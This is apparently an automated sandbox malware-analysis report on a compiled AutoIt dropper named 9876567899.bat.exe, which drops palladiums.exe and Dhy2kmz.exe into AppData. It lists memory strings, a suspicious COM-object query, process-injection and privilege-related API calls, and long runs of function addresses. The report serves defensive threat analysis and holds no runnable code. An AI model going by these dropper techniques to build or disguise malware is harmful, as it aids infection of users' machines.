Source: palladiums.exe, 00000019.00000000.2279710337.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ac056e16-d
Source: palladiums.exe, 0000001A.00000002.2297711549.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_44b820d4-3
Source: palladiums.exe, 0000001A.00000002.2297711549.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_28c4d74a-6
Source: palladiums.exe, 0000001B.00000000.2297233561.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cf92e57b-4
Source: palladiums.exe, 0000001B.00000000.2297233561.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4043846e-5
Source: palladiums.exe, 0000001C.00000000.2306338823.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fb4fd0ad-2
Source: palladiums.exe, 0000001C.00000000.2306338823.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_80935f0e-9
Source: palladiums.exe, 0000001D.00000000.2314892650.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2c58d131-a
Source: palladiums.exe, 0000001D.00000000.2314892650.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b8458120-e
Source: palladiums.exe, 0000001E.00000000.2325824658.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f19f2c57-c
Source: palladiums.exe, 0000001E.00000000.2325824658.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_43dad8c4-d
Source: palladiums.exe, 00000023.00000002.2384224017.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2db6cc16-0
Source: palladiums.exe, 00000023.00000002.2384224017.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_f8bcb24e-8

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0696AEB0 NtResumeThread,	4_2_0696AEB0
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06967548 NtProtectVirtualMemory,	4_2_06967548
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0696AEA8 NtResumeThread,	4_2_0696AEA8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06967540 NtProtectVirtualMemory,	4_2_06967540

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0077D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0077D5EB

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_00771201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00771201

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0077E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_0077E8F6
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0009E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_0009E8F6

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00718060	0_2_00718060
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00782046	0_2_00782046
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00778298	0_2_00778298
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0074E4FF	0_2_0074E4FF
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0074676B	0_2_0074676B
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007A4873	0_2_007A4873
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0071CAF0	0_2_0071CAF0
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0073CAA0	0_2_0073CAA0
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0072CC39	0_2_0072CC39
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00746DD9	0_2_00746DD9
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0072B119	0_2_0072B119
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007191C0	0_2_007191C0
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00731394	0_2_00731394
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00731706	0_2_00731706
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0073781B	0_2_0073781B
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0072997D	0_2_0072997D
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00717920	0_2_00717920
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007319B0	0_2_007319B0
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00737A4A	0_2_00737A4A
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00731C77	0_2_00731C77
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00737CA7	0_2_00737CA7
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0079BE44	0_2_0079BE44
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00749EEE	0_2_00749EEE
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0071BF40	0_2_0071BF40
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00731F32	0_2_00731F32
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_01322E68	0_2_01322E68
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A2046	2_2_000A2046
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00038060	2_2_00038060
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00098298	2_2_00098298
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0006E4FF	2_2_0006E4FF
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0006676B	2_2_0006676B
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000C4873	2_2_000C4873
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0005CAA0	2_2_0005CAA0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0003CAF0	2_2_0003CAF0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0004CC39	2_2_0004CC39
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00066DD9	2_2_00066DD9
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0004B119	2_2_0004B119
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000391C0	2_2_000391C0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00051394	2_2_00051394
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00051706	2_2_00051706
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0005781B	2_2_0005781B
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00037920	2_2_00037920
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0004997D	2_2_0004997D
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000519B0	2_2_000519B0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00057A4A	2_2_00057A4A
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00051C77	2_2_00051C77
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00057CA7	2_2_00057CA7
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000BBE44	2_2_000BBE44
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00069EEE	2_2_00069EEE
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00051F32	2_2_00051F32
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00F030B0	2_2_00F030B0
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_00BCB843	4_2_00BCB843
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_00BC7900	4_2_00BC7900
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_00BC78F0	4_2_00BC78F0
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_00BC3990	4_2_00BC3990
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_00BC3980	4_2_00BC3980
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_00BC3E10	4_2_00BC3E10
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_00BC3F18	4_2_00BC3F18
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064DA4F8	4_2_064DA4F8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E4350	4_2_064E4350
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E0B40	4_2_064E0B40
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E0B3F	4_2_064E0B3F
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E5868	4_2_064E5868
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E7880	4_2_064E7880
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E7890	4_2_064E7890
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E2148	4_2_064E2148
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_064E2158	4_2_064E2158
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06682700	4_2_06682700
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06680210	4_2_06680210
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066826F0	4_2_066826F0
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06680200	4_2_06680200
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0668BD62	4_2_0668BD62
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0668BD70	4_2_0668BD70
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066A75A0	4_2_066A75A0
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066A9C58	4_2_066A9C58
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066ADD40	4_2_066ADD40
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066A09D7	4_2_066A09D7
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066A759A	4_2_066A759A
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066AF338	4_2_066AF338
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066AE067	4_2_066AE067
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066A0040	4_2_066A0040
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066A0022	4_2_066A0022
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066A9C48	4_2_066A9C48
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066AAA01	4_2_066AAA01
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066F0040	4_2_066F0040
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066F0006	4_2_066F0006
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_066FE5D8	4_2_066FE5D8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06710448	4_2_06710448
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06710439	4_2_06710439
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_0671F4F8	4_2_0671F4F8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06718270	4_2_06718270
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06711BF8	4_2_06711BF8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06711BE8	4_2_06711BE8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06717BB8	4_2_06717BB8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06717BAA	4_2_06717BAA
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06963D70	4_2_06963D70
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_06963D60	4_2_06963D60
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_069BFB20	4_2_069BFB20
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_069BEA50	4_2_069BEA50
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_069A0023	4_2_069A0023
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_069A0040	4_2_069A0040
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4_2_069BE550	4_2_069BE550
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 9_2_00F01D00	9_2_00F01D00
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 11_2_010DAEC0	11_2_010DAEC0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 12_2_00F34390	12_2_00F34390
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 14_2_00EB8C70	14_2_00EB8C70
